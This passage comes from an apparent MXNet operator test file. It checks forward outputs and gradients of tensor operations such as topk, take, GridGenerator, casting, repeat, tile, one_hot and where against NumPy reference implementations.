if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
                    check_symbolic_forward(b, location={'a': a_npy},
                                           expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                                             is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
                i = np.clip(i, 0, data_shape[axis] - 1)
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
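        # Added note: every output grid point is theta applied to the homogeneous normalized
        # target coordinate [x; y; 1], so the analytic gradient below is out_grad (reshaped to
        # 2 x N) times the transpose of that 3 x N coordinate matrix, built in `tmp`.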
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
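# For example (illustrative): near 1.0 the float16-representable values step by 1/1024,
# so a generated midpoint such as 1 + 1/2048 is an exact tie that round-to-nearest-even
# should resolve to the even mantissa, i.e. 1.0.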
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with the same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
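# Note: amp_multicast is expected to promote all of its inputs to the widest dtype
# present among them (float32 here), which the dtype asserts below verify.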
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
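# Note: repeat copies each element `repeats` times along `axis`, so its gradient sums
# the output gradient over each group of `repeats` consecutive entries, as done below.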
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
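# Note: the gradient of tile sums the output gradient over all tiled copies of each
# input element, i.e. over positions congruent to (i, j) modulo (n1, n2); the strided
# slice below is equivalent only because reps1 == n1 and reps2 == n2 in this test.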
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
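# Note: indices outside the range [0, depth) leave the corresponding row entirely at
# off_value, which the range check in the loop below reproduces.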
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
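# Note: the condition input only routes values and is treated as non-differentiable,
# so its expected gradient is all zeros.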
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
